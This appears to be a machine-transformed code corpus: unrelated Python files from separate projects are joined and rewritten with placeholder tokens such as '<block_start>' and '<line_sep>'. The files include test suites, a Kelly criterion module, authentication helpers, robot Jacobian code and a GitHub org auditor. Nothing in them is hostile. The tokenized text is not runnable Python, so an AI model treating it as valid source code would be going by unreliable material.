run_id=dagrun.run_id)<line_sep>ti.log.disabled=<false><line_sep><yield>ti<line_sep>clear_db_runs()<block_end><def_stmt>assert_prefix task_instance:TaskInstance prefix:str<arrow><none><block_start>handler=next((h<for>h task_instance.log.handlers<if>h.name<eq>TASK_HANDLER) <none>)<assert_stmt>handler<is><not><none> "custom task log handler not set up correctly"<assert_stmt>handler.formatter<is><not><none> "custom task log formatter not set up correctly"<line_sep>expected_format=f"{prefix}:{handler.formatter._fmt}"<line_sep>set_context(task_instance.log task_instance)<assert_stmt>expected_format<eq>handler.formatter._fmt<block_end><def_stmt>test_custom_formatter_default_format task_instance<block_start>"""The default format provides no prefix."""<line_sep>assert_prefix(task_instance "")<block_end>@conf_vars({("logging" "task_log_prefix_template"):"{{ti.dag_id }}-{{ ti.task_id }}"})<def_stmt>test_custom_formatter_custom_format_not_affected_by_config task_instance<block_start>assert_prefix(task_instance f"{DAG_ID}-{TASK_ID}")<block_end>
<import_from_stmt>mrq.job Job<import_stmt>datetime<import_from_stmt>mrq.queue Queue<import_stmt>time<import_stmt>pytest<line_sep>@pytest.mark.parametrize(["p_queue" "p_pushback" "p_timed" "p_flags"] [["test_timed_set" <false> <true> "--greenlets 10"] ["pushback_timed_set" <true> <true> "--greenlets 10"] ["test_sorted_set" <false> <false> "--greenlets 1"]])<def_stmt>test_raw_sorted worker p_queue p_pushback p_timed p_flags<block_start>worker.start(flags="%s --config tests/fixtures/config-raw1.py"%p_flags queues=p_queue)<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>current_time=int(time.time())<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep># Schedule one in the past, one in the future worker.send_raw_tasks(p_queue {"aaa":current_time-10 "bbb":current_time+5 "ccc":current_time+10} block=<false>)<line_sep># Re-schedule worker.send_raw_tasks(p_queue {"ccc":current_time+6} block=<false>)<line_sep>time.sleep(3)<if_stmt><not>p_timed<block_start><assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>test_collection.count()<eq>3<assert_stmt>list(test_collection.find(projection={"params":1 "_id":0}).limit(1))<eq>[{"params":{"sorted_set":"aaa"}}]<line_sep><return><block_end><if_stmt>p_pushback<block_start><assert_stmt>Queue(p_queue).size()<eq>3<assert_stmt>set(Queue(p_queue).list_raw_jobs())<eq>set([b"bbb" b"ccc" b"aaa"])<block_end><else_stmt><block_start><assert_stmt>Queue(p_queue).size()<eq>2<assert_stmt>set(Queue(p_queue).list_raw_jobs())<eq>set([b"bbb" b"ccc"])<block_end># The second one should not yet even exist in mrq_jobs <assert_stmt>jobs_collection.count()<eq>1<assert_stmt>list(jobs_collection.find())[0]["status"]<eq>"success"<assert_stmt>list(test_collection.find(projection={"params":1 "_id":0}))<eq>[{"params":{"timed_set":"aaa"}}]<line_sep># Then wait for the second job to be done time.sleep(5)<if_stmt>p_pushback<block_start><assert_stmt>Queue(p_queue).size()<eq>3<block_end><else_stmt><block_start><assert_stmt>Queue(p_queue).size()<eq>0<block_end><assert_stmt>jobs_collection.count()<eq>3<assert_stmt>list(jobs_collection.find())[1]["status"]<eq>"success"<assert_stmt>list(jobs_collection.find())[2]["status"]<eq>"success"<assert_stmt>list(jobs_collection.find())[2]["worker"]<assert_stmt>test_collection.count()<eq>3<block_end>@pytest.mark.parametrize("has_subqueue" [<false> <true>])@pytest.mark.parametrize(["p_queue" "p_set"] [["test_raw" <false>] ["test_set" <true>]])<def_stmt>test_raw_set worker has_subqueue p_queue p_set<block_start>flags="--greenlets 10 --config tests/fixtures/config-raw1.py"<if_stmt>has_subqueue<block_start>flags="%s --subqueues_refresh_interval=0.1"%flags<line_sep># worker should dequeue all subqueues p_queue="%s/"%p_queue<block_end>worker.start(flags=flags queues=p_queue)<if_stmt>has_subqueue# queue tasks in p_queue/subqueue <block_start>p_queue="%ssubqueue"%p_queue<block_end>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue ["aaa" "bbb" "ccc" "bbb"] 
block=<true>)<assert_stmt>Queue(p_queue).size()<eq>0<if_stmt>p_set<block_start><assert_stmt>jobs_collection.count()<eq>3<assert_stmt>jobs_collection.count({"status":"success"})<eq>3<assert_stmt>test_collection.count()<eq>3<block_end><else_stmt><block_start><assert_stmt>jobs_collection.count()<eq>4<assert_stmt>jobs_collection.count({"status":"success"})<eq>4<assert_stmt>test_collection.count()<eq>4<block_end><block_end><def_stmt>test_raw_started worker<block_start>worker.start(flags="--greenlets 2 --config tests/fixtures/config-raw1.py" queues="teststarted_raw teststartedx")<line_sep>worker.send_raw_tasks("teststarted_raw" ["f1" "f2" "f3"] block=<false>)<line_sep>time.sleep(2)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.find({"status":"started" "queue":"teststartedx"}).count()<eq>2<assert_stmt>jobs_collection.count()<eq>2<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f1"})<line_sep>time.sleep(1)<assert_stmt>jobs_collection.find({"status":"success" "queue":"teststartedx"}).count()<eq>1<assert_stmt>jobs_collection.find({"status":"started" "queue":"teststartedx"}).count()<eq>2<assert_stmt>jobs_collection.count()<eq>3<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f2"})<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f3"})<line_sep>time.sleep(1)<line_sep>worker.stop(block=<true> deps=<false>)<assert_stmt>jobs_collection.find({"status":"success" "queue":"teststartedx"}).count()<eq>3<assert_stmt>jobs_collection.count()<eq>3<line_sep>worker.stop_deps()<block_end>@pytest.mark.parametrize(["p_queue"] [["test_raw"] ["test_set"] ["test_timed_set"]])<def_stmt>test_raw_remove worker p_queue<block_start>worker.start_deps()<line_sep>worker.send_raw_tasks(p_queue ["aa" "bb" "cc"] block=<false> start=<false>)<assert_stmt>Queue(p_queue).size()<eq>3<line_sep>Queue(p_queue).remove_raw_jobs(["aa" "cc"])<assert_stmt>Queue(p_queue).size()<eq>1<line_sep>worker.stop_deps()<block_end><def_stmt>test_raw_exception worker<block_start>p_queue="testexception_raw"<line_sep>worker.start(flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues=p_queue)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue ["msg1"] block=<true>)<line_sep>failjob=list(jobs_collection.find())[0]<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>failjob["status"]<eq>"failed"<line_sep>worker.stop(deps=<false>)<line_sep>worker.start(deps=<false> flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues="default")<line_sep>worker.send_task("mrq.basetasks.utils.JobAction" {"id":failjob["_id"] "action":"requeue"} block=<true>)<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>2<assert_stmt>list(jobs_collection.find({"_id":failjob["_id"]}))[0]["status"]<eq>"queued"<assert_stmt>list(jobs_collection.find({"_id":{"$ne":failjob["_id"]}}))[0]["status"]<eq>"success"<line_sep>worker.stop(deps=<false>)<line_sep>worker.start(deps=<false> flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues="default testx")<line_sep>worker.wait_for_idle()<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>2<assert_stmt>Queue("testx").size()<eq>0<assert_stmt>list(jobs_collection.find({"_id":failjob["_id"]}))[0]["status"]<eq>"failed"<block_end><def_stmt>test_raw_retry 
worker<block_start>p_queue="testretry_raw"<line_sep>worker.start(flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues=p_queue)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue [0] block=<true>)<line_sep>failjob=list(jobs_collection.find())[0]<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue("testx").size()<eq>1<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>failjob["status"]<eq>"queued"<assert_stmt>failjob["queue"]<eq>"testx"<block_end>@pytest.mark.parametrize(["p_queue" "p_greenlets"] [x1+x2<for>x1 [["test_raw default test"] # ["default test_raw test"], # ["default test_raw test_set"], # ["test_set test_raw default"], # ["test test2 test_set test_raw default"] ]<for>x2 [# [1], [2] # [10] ]])<def_stmt>test_raw_mixed worker p_queue p_greenlets<block_start>worker.start_deps()<line_sep>worker.send_raw_tasks("test_raw" ["aaa" "bbb" "ccc"] start=<false> block=<false>)<line_sep>worker.send_task("tests.tasks.general.MongoInsert" {"not_raw":"ddd"} start=<false> block=<false>)<assert_stmt>Queue("test_raw").size()<eq>3<assert_stmt>Queue("default").size()<eq>1<line_sep>worker.start(flags="--greenlets %s --config tests/fixtures/config-raw1.py"%p_greenlets queues=p_queue deps=<false>)<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>time.sleep(3)<assert_stmt>Queue("test_raw").size()<eq>0<assert_stmt>Queue("default").size()<eq>0<assert_stmt>test_collection.count()<eq>4<assert_stmt>jobs_collection.count()<eq>4<assert_stmt>jobs_collection.find({"status":"success"}).count()<eq>4<assert_stmt>list(jobs_collection.find({"status":"success"}))[0]["worker"]<block_end><def_stmt>test_raw_no_storage worker<block_start>""" Test tasks that don't store unless they go to error status like 'failed' """<line_sep>worker.start(flags="--config tests/fixtures/config-raw1.py" queues="default testnostorage_raw")<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.MongoInsert 3"] block=<false>)<line_sep>time.sleep(2)<line_sep># No started inserted. <assert_stmt>jobs_collection.count()<eq>0<line_sep>time.sleep(2)<line_sep># No success either, but we did insert <assert_stmt>test_collection.count()<eq>1<assert_stmt>jobs_collection.count()<eq>0<line_sep>test_collection.remove({})<line_sep># However failed tasks get stored. worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.RaiseException 0"] block=<false>)<line_sep>time.sleep(2)<line_sep># Failed was inserted. <assert_stmt>jobs_collection.count({"status":"failed" "path":"tests.tasks.general.RaiseException"})<eq>1<line_sep># If we requeue and don't raise, should be OK and inserted this time, even in success # no_storage depends on a raw queue, not a task path. 
_id=jobs_collection.find_one()["_id"]<line_sep>jobs_collection.update({"_id":_id} {"$set":{"path":"tests.tasks.general.MongoInsert"}})<line_sep>job=Job(_id).fetch(full_data=<true>)<line_sep>job.requeue(queue="default")<line_sep>time.sleep(1)<assert_stmt>test_collection.count()<eq>1<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>jobs_collection.count({"status":"success"})<eq>1<line_sep>jobs_collection.remove({})<line_sep># Test with retry: should be inserted worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.Retry 0"] block=<false>)<assert_stmt>jobs_collection.count({"status":"started"})<eq>0<line_sep>time.sleep(2)<assert_stmt>jobs_collection.count({"status":"retry"})<eq>1<block_end>
# Copyright 2016-present CERN – European Organization for Nuclear Research # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>qf_lib.containers.series.qf_series QFSeries<import_from_stmt>qf_lib.containers.series.simple_returns_series SimpleReturnsSeries<def_stmt>kelly qf_series:QFSeries<arrow>float<block_start>""" Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for the series of returns/prices. Kelly Criterion assumptions: 1. You trade the same way you traded in the past. 2. Each return corresponds to one trade. 3. Returns are normally distributed (calculated value will be close to the ideal kelly value even for highly skewed returns. Test showed that the difference of up to 10% (relative) might occur for extremely skewed distributions. Parameters ---------- qf_series: QFSeries timeseries of returns/prices. Each return/price must correspond to one trade. Returns ------- float fraction of money that should be invested """<line_sep># it is important to convert a series to simple returns and not log returns returns_tms=qf_series.to_simple_returns()# type: SimpleReturnsSeries mean=returns_tms.mean()<line_sep>variance=returns_tms.var()<line_sep>kelly_criterion_value=mean/variance<line_sep><return>kelly_criterion_value<block_end><def_stmt>kelly_binary win_probability:float win_size:float lose_size:float<arrow>float<block_start>""" Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for a bet that has two possible outcomes. NOTE: This method should not be used to estimate the kelly value for a timeseries. Parameters ---------- win_probability:float probability of winning. Assumes that probability of losing is 1 - win_probability. win_size: float gain if we win. For example: 0.7 means that we get additional 70% of what we bet. (if we bet 10$ and we win we now have 17$) new_value = old_value * (1 + win_size) lose_size: float lose if we lose. This value should be negative. For example: -0.2 means that we lose 20% of what we bet. (if we bet 10$ and we lose we now have 8$) new_value = old_value * (1 + lose_size) Returns ------- float fraction of money that should be invested """<line_sep>kelly_value=(-win_size<times>win_probability+lose_size<times>win_probability-lose_size)/(win_size<times>lose_size)<line_sep><return>kelly_value<block_end>
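# Hypothetical usage sketch (not part of the original module): for an even-money bet (win_size=1.0, lose_size=-1.0) won 55% of the time, the closed-form Kelly fraction is p - q = 0.55 - 0.45 = 0.10, and kelly_binary should reproduce that value. <if_stmt>__name__<eq>'__main__'<block_start>fraction=kelly_binary(win_probability=0.55 win_size=1.0 lose_size=-1.0)<line_sep>print(round(fraction 4))<block_end>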
<import_from_stmt>..render engine<class_stmt>ChartMixin<block_start><def_stmt>add_js_funcs self *fns<block_start><for_stmt>fn fns<block_start>self.js_functions.add(fn)<block_end><return>self<block_end><def_stmt>load_javascript self<block_start><return>engine.load_javascript(self)<block_end><block_end><class_stmt>CompositeMixin(ChartMixin)<block_start><def_stmt>__iter__ self<block_start><for_stmt>chart self._charts<block_start><yield>chart<block_end><block_end><def_stmt>__len__ self<block_start><return>len(self._charts)<block_end><block_end>
# Generated by Django 2.1.5 on 2019-05-31 09:14 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('oauth' '0002_auto_20190512_1129') ]<line_sep>operations=[migrations.AlterModelOptions(name='oauthconfig' options={'ordering':['-add_time'] 'verbose_name':'0-OAuth配置' 'verbose_name_plural':'0-OAuth配置'} ) migrations.AlterModelOptions(name='oauthuser' options={'ordering':['-add_time'] 'verbose_name':'1-Oauth用户' 'verbose_name_plural':'1-Oauth用户'} ) ]<block_end>
######### # Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. <import_stmt>string<import_from_stmt>flask current_app<import_from_stmt>itsdangerous BadSignature SignatureExpired<import_from_stmt>..storage.idencoder get_encoder<import_from_stmt>cloudify.constants CLOUDIFY_API_AUTH_TOKEN_HEADER<import_from_stmt>manager_rest.storage.models User<import_from_stmt>manager_rest.manager_exceptions NotFoundError<import_from_stmt>manager_rest.storage user_datastore get_storage_manager<import_from_stmt>manager_rest.execution_token set_current_execution get_current_execution_by_token get_execution_token_from_request <line_sep>ENCODED_ID_LENGTH=5<def_stmt>user_loader request<block_start>"""Attempt to retrieve the current user from the request Either from request's Authorization attribute, or from the token header Having this function makes sure that this will work: > from flask_security import current_user > current_user <manager_rest.storage.models.User object at 0x50d9d10> :param request: flask's request :return: A user object, or None if not found """<if_stmt>request.authorization<block_start><return>get_user_from_auth(request.authorization)<block_end>execution_token=get_execution_token_from_request(request)<if_stmt>execution_token<block_start>execution=get_current_execution_by_token(execution_token)<line_sep>set_current_execution(execution)# Sets the request current execution <return>execution.creator<if>execution<else><none><block_end>token=get_token_from_request(request)<if_stmt>token<block_start>_,_,user,_,_=get_token_status(token)<line_sep><return>user<block_end>api_token=get_api_token_from_request(request)<if_stmt>api_token<block_start>user,user_token_key=extract_api_token(api_token)<line_sep><return>user<block_end><if_stmt>current_app.external_auth<and>current_app.external_auth.can_extract_user_from_request()<block_start>user=current_app.external_auth.get_user_from_request(request)<if_stmt>isinstance(user User)<block_start><return>user<block_end><block_end><return><none><block_end><def_stmt>extract_api_token api_token<block_start>user_id=api_token[:ENCODED_ID_LENGTH]<line_sep>user_token_key=api_token[ENCODED_ID_LENGTH:]<line_sep>user_id=get_encoder().decode(user_id)<try_stmt><block_start>user=get_storage_manager().get(User user_id)<block_end><except_stmt>NotFoundError<block_start><return><none> <none><block_end><return>user user_token_key<block_end><def_stmt>get_user_from_auth auth<block_start><if_stmt><not>auth<or><not>auth.username<block_start><return><none><block_end><if_stmt>auth.username[0]<not><in>string.ascii_letters<block_start><return><none><block_end><return>user_datastore.get_user(auth.username)<block_end><def_stmt>get_token_from_request request<block_start>token_auth_header=current_app.config['SECURITY_TOKEN_AUTHENTICATION_HEADER']<line_sep><return>request.headers.get(token_auth_header)<block_end><def_stmt>get_api_token_from_request 
request<block_start><return>request.headers.get(CLOUDIFY_API_AUTH_TOKEN_HEADER)<block_end><def_stmt>get_token_status token<block_start>"""Mimic flask_security.utils.get_token_status with some changes :param token: The token to decrypt :return: A tuple: (expired, invalid, user, data) """<line_sep>security=current_app.extensions['security']<line_sep>serializer=security.remember_token_serializer<line_sep>max_age=security.token_max_age<line_sep>user,data,error=<none> <none> <none><line_sep>expired,invalid=<false> <false><try_stmt><block_start>data=serializer.loads(token max_age=max_age)<block_end><except_stmt>SignatureExpired<block_start>expired=<true><block_end><except_stmt>(BadSignature TypeError ValueError)<as>e<block_start>invalid=<true><line_sep>error=e<block_end><if_stmt>data<block_start>user=user_datastore.find_user(id=data[0])<block_end><return>expired invalid user data error<block_end>
<import_stmt>sympy<line_sep>_id=<lambda>x:x<class_stmt>Kinematics(object)<block_start>"""Robot symbolic Jacobians. kinobj.J: list of link frame Jacobians - complete (6 x N): [linear_velocity angular_velocity] = J * joint_velocities kinobj.Jc: list of link center-of-mass Jacobians - complete kinobj.Jp: list of link frame Jacobians - linear velocity part only kinobj.Jo: list of link frame Jacobians - angular velocity part only kinobj.Jcp: list of link center-of-mass Jacobians - linear part kinobj.Jco: list of link center-of-mass Jacobians - angular part """<def_stmt>__init__ self robotdef geom ifunc=<none><block_start><if_stmt><not>ifunc<block_start>ifunc=_id<block_end>self.rbtdef=robotdef<line_sep>self.geom=geom<line_sep>self.dof=self.rbtdef.dof<def_stmt>sym_skew v<block_start><return>sympy.Matrix([[0 -v[2] v[1]] [v[2] 0 -v[0]] [-v[1] v[0] 0]])<block_end><if_stmt>self.rbtdef._dh_convention<eq>'standard'# extend z and p so that z[-1] and p[-1] return values from base # frame <block_start>z_ext=geom.z+[sympy.Matrix([0 0 1])]<line_sep>p_ext=geom.p+[sympy.zeros(3 1)]<line_sep>self.Jp=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jp[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jp[l][0:3 j]=ifunc(z_ext[j-1])<block_end><else_stmt><block_start>self.Jp[l][0:3 j]=ifunc(z_ext[j-1].cross((p_ext[l]-p_ext[j-1])).reshape(3 1))<block_end><block_end><block_end>self.Jo=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jo[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jo[l][0:3 j]=sympy.zeros(3 1)<block_end><else_stmt><block_start>self.Jo[l][0:3 j]=ifunc(z_ext[j-1])<block_end><block_end><block_end><block_end><elif_stmt>self.rbtdef._dh_convention<eq>'modified'<block_start>self.Jp=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jp[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jp[l][0:3 j]=ifunc(geom.z[j])<block_end><else_stmt><block_start>self.Jp[l][0:3 j]=ifunc(geom.z[j].cross((geom.p[l]-geom.p[j])).reshape(3 1))<block_end><block_end><block_end>self.Jo=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jo[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jo[l][0:3 j]=sympy.zeros(3 1)<block_end><else_stmt><block_start>self.Jo[l][0:3 j]=ifunc(geom.z[j])<block_end><block_end><block_end><block_end>self.J=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.J[l]=self.Jp[l].col_join(self.Jo[l])<block_end>self.Jcp=list(range(self.rbtdef.dof))<line_sep>self.Jco=self.Jo<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jcp[l]=ifunc(self.Jp[l]-sym_skew(geom.R[l]<times>sympy.Matrix(self.rbtdef.l[l]))<times>self.Jo[l])<block_end>self.Jc=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jc[l]=self.Jcp[l].col_join(self.Jco[l])<block_end><block_end><block_end>
<import_from_stmt>django.templatetags.static static<import_from_stmt>django.utils.functional lazy<line_sep>static_lazy=lazy(static str)<line_sep>
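# Hypothetical usage sketch (the asset path below is a placeholder, not from the original module): because the lookup is lazy, a static URL can be referenced safely at import time, e.g. as a module-level constant or inside a widget's Media definition, and it only resolves to a real URL when the value is rendered. LOGO_URL=static_lazy('img/logo.png')<line_sep>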
# -- coding: utf-8 -- # # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights # Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the # License. # <import_stmt>os<import_stmt>typing<import_from_stmt>ask_sdk_runtime.view_resolvers AbstractTemplateEnumerator<import_from_stmt>ask_sdk_core.utils.view_resolver split_locale<if_stmt>typing.TYPE_CHECKING<block_start><import_from_stmt>typing Iterator Type<import_from_stmt>ask_sdk_core.handler_input HandlerInput<block_end><class_stmt>LocaleTemplateEnumerator(AbstractTemplateEnumerator)<block_start>"""Enumerator to enumerate template name based on locale property. Enumerate possible combinations of template name and given locale from the HandlerInput. For Example: For locale: 'en-US' and a response template name "template", the following combinations will be generated: template/en/US template/en_US template/en template_en_US template_en template """<line_sep>__instance=<none><def_stmt>__new__ cls# type: (Type[object]) -> LocaleTemplateEnumerator <block_start>"""Creating a singleton class to re-use same enumerator instance for different locale and template values. """<if_stmt>LocaleTemplateEnumerator.__instance<is><none><block_start>LocaleTemplateEnumerator.__instance=object.__new__(cls)<block_end><return>LocaleTemplateEnumerator.__instance<block_end><def_stmt>__init__ self# type: () -> None <block_start>"""Enumerator to generate different path combinations for a given locale to load the template. """<line_sep><pass><block_end><def_stmt>generate_combinations self handler_input template_name# type: (HandlerInput, str) -> Iterator[str] <block_start>"""Create a generator object to iterate over different combinations of template name and locale property. :param handler_input: Handler Input instance with Request Envelope containing Request. :type handler_input: :py:class:`ask_sdk_core.handler_input.HandlerInput` :param template_name: Template name which needs to be loaded :type template_name: str :return: Generator object which returns relative paths of the template file :rtype: Iterator[str] """<line_sep>locale=handler_input.request_envelope.request.locale<line_sep>language,country=split_locale(locale=locale)<if_stmt><not>language<and><not>country<block_start><yield>template_name<block_end><else_stmt><block_start><yield>os.path.join(template_name language country)<line_sep><yield>os.path.join(template_name (language+"_"+country))<line_sep><yield>os.path.join(template_name language)<line_sep><yield>(template_name+"_"+language+"_"+country)<line_sep><yield>(template_name+"_"+language)<line_sep><yield>template_name<block_end><block_end><block_end>
# Copyright 2017 Netflix # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. module: security_monkey.watchers.github.org :platform: Unix :synopsis: Auditor for GitHub Organizations .. version:: $$VERSION$$ .. moduleauthor:: <NAME> <<EMAIL>> """<import_from_stmt>security_monkey.auditor Auditor<import_from_stmt>security_monkey.watchers.github.org GitHubOrg<class_stmt>GitHubOrgAuditor(Auditor)<block_start>index=GitHubOrg.index<line_sep>i_am_singular=GitHubOrg.i_am_singular<line_sep>i_am_plural=GitHubOrg.i_am_plural<def_stmt>__init__ self accounts=<none> debug=<false><block_start>super(GitHubOrgAuditor self).__init__(accounts=accounts debug=debug)<block_end><def_stmt>check_for_public_repo self org_item<block_start>""" Checks whether the organization has public repositories. Default score of 0. This is mostly informational. :param org_item: :return: """<line_sep>tag="Organization contains public repositories."<if_stmt>org_item.config["public_repos"]<g>0<block_start>self.add_issue(0 tag org_item notes="Organization contains public repositories")<block_end><block_end><def_stmt>check_for_non_twofa_members self org_item<block_start>""" Alert if the org has users that don't have 2FA enabled. Will keep this at a level of 2 -- unless there are admins without 2FA, then that is level 10! :param org_item: :return: """<line_sep>tag="Organization contains users without 2FA enabled."<line_sep>owner_no_twofa="Organization owner does NOT have 2FA enabled!"<if_stmt>len(org_item.config["no_2fa_members"])<g>0<block_start>self.add_issue(2 tag org_item notes="Organization contains users without 2FA enabled")<for_stmt>notwofa org_item.config["no_2fa_members"]<block_start><if_stmt>notwofa<in>org_item.config["owners"]<block_start>self.add_issue(10 owner_no_twofa org_item notes="Organization OWNER: {} does NOT "<concat>"have 2FA enabled!".format(notwofa))<block_end><block_end><block_end><block_end><block_end>
<import_from_stmt>pathlib Path<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>sklearn.datasets fetch_openml<import_from_stmt>npt.datasets.base BaseDataset<class_stmt>IncomeDataset(BaseDataset)<block_start><def_stmt>__init__ self c<block_start>super().__init__(fixed_test_set_index=-99762)<line_sep>self.c=c<block_end><def_stmt>load self<block_start>"""KDD Income Dataset Possibly used in VIME and TabNet. There are multiple datasets called income. https://archive.ics.uci.edu/ml/datasets/census+income https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29 The KDD One is significantly larger than the other one. We will take KDD one. Both TabNet and VIME are not super explicit about which dataset they use. TabNet cite Oza et al "Online Bagging and Boosting", which use the bigger one. So we will start with that. (But there is no full TabNet Code to confirm.) Binary classification. Target in last column. 299.285 rows. 42 attributes. Use get_num_cat_auto to assign. 1 target """<line_sep># Load data from https://www.openml.org/d/4535 data_home=Path(self.c.data_path)/self.c.data_set<line_sep>data=fetch_openml('Census-income' version=1 data_home=data_home)<line_sep># target in 'data' self.data_table=data['data']<if_stmt>isinstance(self.data_table np.ndarray)<block_start><pass><block_end><elif_stmt>isinstance(self.data_table pd.DataFrame)<block_start>self.data_table=self.data_table.to_numpy()<block_end>self.N=self.data_table.shape[0]<line_sep>self.D=self.data_table.shape[1]<line_sep># Target col is the last feature # last column is target (V42) # (binary classification, if income > or < 50k) self.num_target_cols=[]<line_sep>self.cat_target_cols=[self.D-1]<line_sep>self.num_features,self.cat_features=BaseDataset.get_num_cat_auto(self.data_table cutoff=55)<line_sep>print('income num cat features')<line_sep>print(len(self.num_features))<line_sep>print(len(self.cat_features))<line_sep># TODO: add missing entries to sanity check self.missing_matrix=np.zeros((self.N self.D) dtype=np.bool_)<line_sep>self.is_data_loaded=<true><line_sep>self.tmp_file_or_dir_names=['openml']<block_end><block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. <import_stmt>aiounittest<import_from_stmt>botbuilder.core MemoryStorage TurnContext PrivateConversationState<import_from_stmt>botbuilder.core.adapters TestAdapter<import_from_stmt>botbuilder.schema Activity ChannelAccount ConversationAccount<line_sep>RECEIVED_MESSAGE=Activity(text="received" type="message" channel_id="test" conversation=ConversationAccount(id="convo") from_property=ChannelAccount(id="user") )<class_stmt>TestPrivateConversationState(aiounittest.AsyncTestCase)<block_start><async_keyword><def_stmt>test_should_load_and_save_state_from_storage self<block_start>storage=MemoryStorage()<line_sep>adapter=TestAdapter()<line_sep>context=TurnContext(adapter RECEIVED_MESSAGE)<line_sep>private_conversation_state=PrivateConversationState(storage)<line_sep># Simulate a "Turn" in a conversation by loading the state, # changing it and then saving the changes to state. <await>private_conversation_state.load(context)<line_sep>key=private_conversation_state.get_storage_key(context)<line_sep>state=private_conversation_state.get(context)<assert_stmt>state<eq>{} "State not loaded"<assert_stmt>key "Key not found"<line_sep>state["test"]="foo"<line_sep><await>private_conversation_state.save_changes(context)<line_sep># Check the storage to see if the changes to state were saved. items=<await>storage.read([key])<assert_stmt>key<in>items "Saved state not found in storage."<assert_stmt>items[key]["test"]<eq>"foo" "Missing test value in stored 